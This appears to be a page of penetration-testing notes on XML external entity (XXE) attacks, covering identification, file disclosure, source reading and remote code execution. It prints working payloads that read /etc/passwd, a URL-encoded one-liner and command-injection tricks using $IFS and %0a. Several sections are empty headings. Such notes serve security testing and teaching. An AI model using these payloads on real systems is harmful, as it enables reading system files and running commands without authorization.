search
githubEdit

XXE

hashtag
1) Identification

XXE vulnerabilities occur when an application parses XML input from untrusted sources and processes external entities. An attacker can manipulate the XML content to read sensitive files from the system; these are the parts of the XML file.

hashtag
2) Local File Disclosure

In this case data is being sent in the XML, so we can change it and test different variables (&[variable];) to display information.

image image

hashtag
2) Reading sensitive files

Consider that in certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.

hashtag
/etc/passwd

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

One liner in a parameter

<%3fxml+version%3d"1.0"%3f><!DOCTYPE+root+[<!ENTITY+test+SYSTEM+'file%3a///etc/passwd'>]><root><user>%26test%3b</user></root>

hashtag
Read a custom file

hashtag
Accessing local files

hashtag
Blind XXE

hashtag
XXE with Network Access

hashtag
3) Read Source Code

In this case we need to be careful because if we are referencing something that is not in proper XML format the External XML Entity vulnerability will not work, this can happens if the file contains XML special characters (eg. | < > { } &); for these cases we could base64 encode them.

image

hashtag
4) Remote Code Execution

In this case we need to be careful with special characters (| < > { } &) as well, as they will break our command, you could even consider encode them. For case see that in example below we replaced all spaces in the above XML code with $IFS, to avoid breaking the XML syntax. Another trick to use for RCE is URL encoding the \n character (newline) with %0a.

Example command you can use to test is: %0als

PreviousXSSNextContent Management Systems (CMS)

Last updated